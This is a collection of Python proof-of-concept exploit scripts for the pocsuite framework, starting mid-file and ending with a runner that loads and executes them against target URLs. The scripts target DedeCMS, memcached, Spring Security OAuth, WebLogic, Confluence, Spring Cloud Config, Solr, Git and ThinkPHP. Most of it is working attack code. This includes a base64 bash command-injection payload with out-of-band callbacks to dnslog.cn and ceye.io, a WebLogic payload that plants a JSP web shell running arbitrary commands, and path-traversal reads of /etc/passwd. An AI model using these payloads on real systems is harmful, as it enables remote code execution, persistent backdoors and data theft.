            "/data/index.html",
            "/data/js/index.html",
            "/data/mytag/index.html",
            "/data/sessions/index.html",
            "/data/textdata/index.html",
            "/dede/action/css_body.css",
            "/dede/css_body.css",
            "/dede/templets/article_coonepage_rule.htm",
            "/include/alert.htm",
            "/member/images/base.css",
            "/member/js/box.js",
            "/php/modpage/readme.txt",
            "/plus/sitemap.html",
            "/setup/license.html",
            "/special/index.html",
            "/templets/default/style/dedecms.css",
            "/company/template/default/search_list.htm"]
        for hashone in dedehash:
            try:
                dedehashone = url + hashone
                r = req.get(dedehashone, timeout=8)
                if r.status_code == 200:
                    # print 'check cms is ok'
                    dedehashone = url + '/' + hashone[1].upper() + hashone[2:]
                    r = req.get(dedehashone, timeout=8)
                    if r.status_code == 200:
                        # print 'check os is ok'
                        if self.GetBackUp(self.url) == 1:
                            # print 'check short is ok'
                            return 1
                        else:
                            break
                    else:
                        break
            except:
                return 0
        return 0
    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        # self.url = self.url
        checkcode = self.TestingCms(self.url)
        if checkcode == 1:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(DedeShortNamePOC)


#!/usr/bin/env python
# coding: utf-8
import socket
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2018-12-25'
    createDate = '2018-12-25'
    updateDate = '2018-12-25'
    references = ['', ]
    name = 'memcached unauthorized access'
    appPowerLink = ''
    appName = 'memcached'
    appVersion = 'All'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    memcached是一套分布式的高速缓存系统。它以Key-Value（键值对）形式将数据存储在内存中，这些数据通常是应用读取频繁的。正因为内存中数据的读取远远大于硬盘，因此可以用来加速应用的访问。
    如果memcached对外开放访问，攻击者可通过该漏洞泄露服务器的敏感信息。
    '''

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [11211, 21211]
        for port in ports:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((pr.hostname, port))
                s.send(b"stats\r\n")
                info = s.recv(4096)
                if b"STAT version" in info:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    result['extra'] = {}
                    result['extra']['evidence'] = info.strip()
            except Exception as ex:
                # raise
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register
import base64

headers1 = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
    'Host': 'www.dnslog.cn',
    'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
    'Accept': '*/*',
    'Referer': 'http://www.dnslog.cn/',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'}

url1 = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"


def get_dns(url1):
    dns_url = req.get(url1, verify=False, timeout=5, headers=headers1).text
    return dns_url


url2 = "http://www.dnslog.cn/getrecords.php?t=0.913020034617231"


def show_dns(url2):
    dns_text = req.get(url2, verify=False, timeout=5, headers=headers1).text
    return dns_text


def poc_payload():
    dns_url = get_dns(url1)
    payload = "ping `whoami`.{}".format(dns_url)
    es = base64.b64encode(payload.encode('utf-8')).decode("utf-8")
    poc_payload = "bash -c {echo," + es + "}|{base64,-d}|{bash,-i}"
    message = poc_payload
    poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

    for ch in message[1:]:
        poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)

    poc += ')}'
    return poc


payload1 = '''${233*233}'''
payload2 = poc_payload()
poc_str = "/oauth/authorize?response_type={}&client_id=acme&scope=openid&redirect_uri=http://test".format(payload2)
headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
    'content-type': 'text/xml', 'Authorization': 'Basic YWRtaW46YWRtaW4='}


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += poc_str
    try:
        res = req.get(url, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'spring_security_OAuth_RCE_CVE-2016-4977'
    vulID = 'CVE-2016-4977'  # https://www.seebug.org/vuldb/ssvid-92474
    author = ['sxd']
    vulType = 'RCE'  # 远程代码执行漏洞
    version = '1.0'  # default version: 1.0
    references = ['']
    desc = '''
		   Spring Security OAuth是为Spring框架提供安全认证支持的一个模块，在7月5日其维护者发布了这样一个升级公告，
		   主要说明在用户使用Whitelabel views来处理错误时，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令
		   '''
    vulDate = '2020-02-6'
    createDate = '2020-02-6'
    updateDate = '2020-02-6'
    appName = 'Spring Security OAuth'
    appVersion = '2.0.0 to 2.0.9，1.0.0 to 1.0.5'
    appPowerLink = ''  # 漏洞厂商主页地址
    samples = ['']  # 测试用例
    install_requires = ["base64"]

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        shwo_dns_text = show_dns(url2)
        if ".dnslog.cn" in shwo_dns_text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'spring_security_OAuth_RCE_CVE-2016-4977' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    name = 'Weblogic wls9_async_response Command Execution '
    vulID = '0'
    author = ['LRestless']
    vulType = 'cmd-exec'
    version = '1'
    references = ['']
    desc = '''CVE-2019-2725/CNVD-C-2019-48814 Weblogic wls9_async_response'''

    vulDate = '2019-04-17'
    createDate = '2019-05-07'
    updateDate = '2019-04-07'

    appName = 'Weblogic'
    appVersion = '10.*/12.1.3'
    appPowerLink = 'https://www.oracle.com/middleware/technologies/weblogic.html'

    payload1 = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{0}.jsp</string><void method="println"><string><![CDATA[
    <%
        if("s{1}".equals(request.getParameter("pwd"))){{
            String in = "{2}";
            out.print("<pre>");          
            out.println(in);          
            out.print("</pre>");
        }} 
        %>]]>
    </string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
            '''
    payload2 = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{0}.jsp</string><void method="println"><string><![CDATA[
    <%
        if("s{0}".equals(request.getParameter("pwd"))){{
            java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int a = -1;
            byte[] b = new byte[1024];          
            out.print("<pre>");          
            while((a=in.read(b))!=-1){{
                out.println(new String(b));          
            }}
            out.print("</pre>");
        }} 
        %>]]>
    </string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
            '''

    def verify_result(self, flag, cmd):
        url = self.url + '/bea_wls_internal/{0}.jsp?pwd=s{1}&cmd={2}'.format(flag, flag, cmd)
        print(url)
        try:
            resp = req.get(url, timeout=30)
            retext = re.compile(r'<pre>(.*?)</pre>', re.S)
            if resp.content:
                data = re.findall(retext, resp.content)[0]
                data = re.sub(r'\x00', '', data)
                data = re.sub('\\r\\n\\r\\n', '   ', data)
                return [data, url]
        except Exception:
            pass
        return False

    def _attack(self):
        """attack mode"""
        result = {}
        filename = "/_async/AsyncResponseService"
        url = self.url.strip('/') + filename
        cmd = 'whoami'
        headers = {'content-type': 'text/xml'}
        #--ping `whoami`.weblogic.xxxxxx.ceye.io--
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        flag = flag.lower()
        data = self.payload2.format(flag)
        r1 = req.post(url, data=data, headers=headers, timeout=7)
        if r1.status_code == 202:
            datalist = self.verify_result(flag, cmd)
            if datalist:
                result['extra'] = {}
                result['extra']['whoami'] = datalist[0]
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url.strip('/') + filename
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = datalist[1]
                result['ShellInfo']['Content'] = data
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        filename = "/_async/AsyncResponseService"
        url = self.url.strip('/') + filename
        print(url)
        headers = {'content-type': 'text/xml'}
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        flag = flag.lower()
        data = self.payload1.format(flag, flag, flag)
        print(data)
        r = req.post(url, data=data, headers=headers, timeout=7)
        if r.status_code == 202:
            flag_url = self.url.strip('/') + '/bea_wls_internal/{0}.jsp?pwd=s{1}'.format(flag, flag)
            print(flag_url)
            r2 = req.get(flag_url)
            if flag in r2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url.strip('/') + filename
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行

#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase

'''
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: 118.24.18.38:8090
Connection: close
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: http://118.24.18.38:8090/pages/viewpage.action?pageId=66662&src=contextnavpagetreemode
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7,ca;q=0.6
Content-Length: 175

{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/23464dc5","width":"300","height":"200","_template":"file:////etc//passwd"},"body":""}}
'''

import requests
import re

#基础基类
class ConfluencPOC(POCBase):
    vulID = '59'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2019-04-07' #漏洞公开的时间,不知道就写今天

    author = 'w7ay' #  PoC作者的大名
    createDate = '2019-04-07'# 编写 PoC 的日期
    updateDate = '2019-04-07'# PoC 更新的时间,默认和编写时间一样
    references = 'https://www.seebug.org/vuldb/ssvid-97898'# 漏洞地址来源,0day不用写
    name = 'Confluence Widget Connector path traversal (CVE-2019-3396)'# PoC 名称 
    appPowerLink = 'https://www.atlassian.com/software/confluence'# 漏洞厂商主页地址
    appName = 'Confluence'# 漏洞应用名称
    appVersion = 'more versions'# 漏洞影响版本
    vulType = 'Remote code execution'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        '2019 年 3 月 28 日，Confluence 官方发布预警 ，指出 Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞，攻击 者能利用此漏洞能够实现目录穿越与远程代码执行，同时该漏洞被赋予编号 CVE2019-3396
    ''' # 漏洞简要描述
    samples = ["http://118.24.18.38:8090"]# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass
        
    #验证模块 pocsuite -r 59-Confluenc-path_traversal.py -u http://118.24.18.38:8090 --verify
    def _verify(self):
        #调用指纹方法
        result = {}
        output = Output()

        filename = "../web.xml"
        limitSize = 1000

        paylaod = self.url + "/rest/tinymce/1/macro/preview"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
            "Referer": self.url,
            "Content-Type": "application/json; charset=utf-8"
        }
        data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
        r = requests.post(paylaod, data=data, headers=headers)

        if r.status_code == 200 and "</web-app>" in r.text:
            m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
            if m:
                content = m.group()[:limitSize]
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = filename
                result['VerifyInfo']['Payload'] = content
                #print result
        return self.save_output(result)

    #攻击模块
    def _attack(self):
        pass

    #输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

#注册类
register(ConfluencPOC)





#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class HTTPPOC(POCBase):
    vulID = '25'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-05-07' #漏洞公开的时间,不知道就写今天

    author = 'colorway' #  PoC作者的大名
    createDate = '2018-05-07'# 编写 PoC 的日期
    updateDate = '2018-05-07'# PoC 更新的时间,默认和编写时间一样
    references = 'https://www.cnblogs.com/bmjoker/p/8809231.html'# 漏洞地址来源,0day不用写
    name = 'http header Injection'# PoC 名称
    appPowerLink = '#'# 漏洞厂商主页地址
    appName = 'http'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'CRLF Injection'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Host头注入漏洞
    ''' # 漏洞简要描述
    samples = ['112.49.24.34']# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危" #严重,高危,中危,低危

    def _verify(self):
        #定义返回结果
        result = {}
        #获取定义请求头
        import random
        seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
        sa = []
        for i in range(8):
          sa.append(random.choice(seed))
        salt = ''.join(sa)
        headers = {
            'Host': salt,
            'User-agent': salt,
            'X-Forwarded-For': salt,
            'cookie': salt,
        }
        proxies = {
            # 'http': 'http://127.0.0.1:8080',
            # 'https': 'http://127.0.0.1:8080',
        }
        try:
            response = req.get(url=self.url, headers=headers,timeout=5, proxies=proxies) 
        except Exception as  e:
            response = ""
        """
        """
        check = response.headers
        # print check
        if response:
            for x in check:
                if salt in check[x]:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Payload'] = 'Host: ' + salt
                    break
        else:
            result = {}
        print('[+]25 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(HTTPPOC)




#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers = {'user-agent': 'ceshi/0.0.1', 'content-type': 'text/xml', }
poc_str = '''/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd'''


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += poc_str
    try:
        res = req.get(url, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'SpringColudConfig_CVE-2019-3799'
    vulID = 'CVE-2019-3799'  # https://www.seebug.org/vuldb/ssvid-97912
    author = ['debug']
    vulType = '目录遍历'  # 任意文件读取
    version = '1.0'  # default version: 1.0
    references = ['https://www.freebuf.com/vuls/201400.html']
    desc = '''
		   Spring Cloud Config，2.1.2之前的2.1.x版本，2.0.4之前的版本2.0.x以及1.4.6之前的版本1.4.x以及较旧的不受支持的版本允许应用程序通过spring提供任意配置文件 - cloud-config-server模块。
           恶意用户或攻击者可以使用可能导致目录遍历攻击的特制URL发送请求。
		   '''
    vulDate = '2020-02-4'
    createDate = '2020-02-4'
    updateDate = '2020-02-4'
    appName = 'Spring Cloud Config'
    appVersion = '2.1.x,2.0.x,1.4.x'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'root:x:0:0:root:/root:/bin/bash' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'SpringColudConfig_CVE-2019-3799' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
#coding=utf-8

import random
import json
import time
import subprocess
import signal
import os
import sys
import base64
import re
from string import ascii_letters
import traceback

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


'''
CVE-2019-0193
'''
class Solr_RCE_0193(POCBase):
    vulID = 'solr-CVE-2019-1093'
    appName = 'Solr'
    appVersion = 'Apache Solr < 8.2.0'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-08-01'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-08-11'  # 编写 PoC 的日期
    updateDate = '2020-05-21'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://www.openwall.com/lists/oss-security/2019/08/01/1']  # 漏洞地址来源,0day不用写
    name = 'Solr DataImportHandler远程代码执行漏洞'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)


    def _verify(self):
        result={}

        vul_url = self.url
        
        url_cores = vul_url + "/solr/admin/cores?wt=json"

        payload = '''command=full-import&dataConfig=
        <dataConfig>
            <dataSource type="URLDataSource"/>
                <script><![CDATA[ java.lang.Runtime.getRuntime().exec("ping {0}.{1}"); 
                ]]></script>
            <document>
                <entity name="a"
                    url="https://stackoverflow.com/feeds"
                    processor="XPathEntityProcessor"
                    forEach="/feed"
                    transformer="script:" />
            </document>
        </dataConfig>'''.format(self.BANNER, self.DOMAIN)


        core_names = self.get_core_names(url_cores)
        print(core_names)

        # 对每个core都发送一次请求
        for core_name in core_names:
            dataimport_url = '{0}/solr/{1}/dataimport'.format(self.url, core_name)
            target_url = dataimport_url
    
            url3 = target_url + "?" + payload
            
            try:
                req.get(url3)    # 利用。也可以用POST
                #req.post(url2, data=payload, proxies={'http': 'http://127.0.0.1:8087'})
            except Exception as e:
                print(e)
                continue
            
            time.sleep(2) # 休眠2s等待ceye生成记录
            if self.test_dnslog(self.CEYE_URL):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['core'] = core_name
                result['VerifyInfo']['Payload'] = payload
                return self.save_output(result)
        
        return self.save_output(result)


    ''' 拿到core的名字'''
    def get_core_name(self, p_url_cores):
        r = req.get(p_url_cores, verify=False, allow_redirects=False)
        
        if r.status_code == 200:
            if r.json()['status'] == "":    # 失败，退出
                self.save_output(result)
            else:
                a = list(r.json()['status'].keys())
        return a[0]


    ''' 拿到所有core的名字'''
    def get_core_names(self, p_url_cores):
        r = req.get(p_url_cores, verify=False, allow_redirects=False)
        
        if r.status_code == 200:
            if r.json()['status'] == "":    # 失败，退出
                self.save_output(result)
            else:
                a = list(r.json()['status'].keys())
        return a


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            sub_domain = d['data'][0]['domain']
            if self.BANNER in sub_domain:
                print(sub_domain)
                return True
        except Exception:
            return False       


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register_poc(Solr_RCE_0193)



#!/usr/bin/env python
# coding: utf-8

import re

from pocsuite.api.request import req
from pocsuite.api.poc import POCBase, Output
from pocsuite.api.poc import register


class TestPOC(POCBase):
    vulID = ''  # vul ID
    version = '1'
    author = ['erevus']
    vulDate = '2015-03-12'
    createDate = '2015-04-09'
    updateDate = '2015-04-09'
    references = ['http://www.wooyun.org/bugs/wooyun-2015-0100762']
    name = 'Git all Information Disclosure'
    appPowerLink = 'http://www.git-scm.com'
    appName = 'Git'
    appVersion = 'all'
    vulType = 'Information Disclosure'
    desc = '''
           .git/config 上传到服务器导致网站源码可down
    '''
    # the sample sites for examine
    samples = ['', '']



    def _verify(self):
        target_url = '/.git/config'

        response = req.get(self.url + target_url, timeout=10, verify=False)
        content = response.content
        if '[remote "origin"]' in content:
            result = {}
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + target_url
        else:
            result = {}

        return self.parse_attack(result)


    def _attack(self):
        return self._verify()


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

def send_command(url):
    try:
        httpreq = req.Session()
        headers = {'Content-Type': 'application/x-www-form-urlencoded',
                   'User-Agent': 'GoogleSpider'
                   }
        resp = httpreq.get(url, headers=headers)
        con = re.search('\<title\>phpinfo\(\)\</title\>', resp.text)
        if con:
            return True
    except Exception as ex:
        resp = None

class TestPOC(POCBase):
    name = 'Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability'
    vulID = ''
    author = ['']
    vulType = 'cmd-exec'
    version = '1.0'
    references = ['']
    desc = '''ThinkPHP is an extremely widely used PHP development 
    framework in China. In its version 5, as the framework processes 
    controller name incorrectly, it can execute any method if the 
    website doesn't have mandatory routing enabled (which is default), resulting in a RCE vulnerability.'''

    vulDate = ''
    createDate = '2019-03-17'
    updateDate = ''

    appName = 'thinkphp'
    appVersion = '5.0.22'
    appPowerLink = 'https://www.thinkphp.cn'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify mode"""
        connect = ['index','home','admin']
        result = {}
        payload1 = '/index.php?s=/'
        payload2 = '/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1'
        for i in connect:
            self.url = self.url + payload1 + i + payload2
            resp = send_command(self.url)
            #result['extra']['evidence'] = self.url
            #result['extra'][i + 'url'] = self.url
            time.sleep(2)
            if resp:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




import sys
import os

try:
    import cvpoc
except ImportError:
    sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))

from cvpoc.api import init_cvpoc
from cvpoc.api import start_cvpoc
from cvpoc.api import get_results

from cvpoc.easypoc.data import POCS, WORKER, CONF, RESULTS
from cvpoc.easypoc.loader import load_string_to_module
from cvpoc.easypoc.threads import run_threads
from cvpoc.easypoc.requests import patch_session, _disable_warnings


def init(config: dict):
    print("[*] target:{}".format(config["url"]))
    patch_session()
    _disable_warnings()
    with open(config.get('poc'), 'r') as f:
        model = load_string_to_module(f.read())
        POCS.append(model)
    CONF.update(config)


def worker():
    if not WORKER.empty():
        arg, poc = WORKER.get()
        try:
            ret = poc.verify(arg)
        except Exception as e:
            ret = None
            # print(e)
        if ret:
            ret = 'success'
        else:
            ret = 'failed'
        RESULTS.append({'status': ret})


def start():
    url_list = CONF.get("url", [])
    # 生产
    for arg in url_list:
        for poc in POCS:
            WORKER.put((arg, poc))
    # 消费
    run_threads(CONF.get("thread_num", 1), worker)


def verify_poc(config):
    poc_file = config.get('poc')
    with open(poc_file, 'r') as f:
        code = f.read()
    if 'pocsuite' in code or 'cvpoc' in code:
        init_cvpoc(config)
        start_cvpoc()
        result = get_results().pop()
        status = result.status

    else:
        init(config)
        start()
        result = RESULTS.pop()
        status = result.get('status', 'failed')

    return status
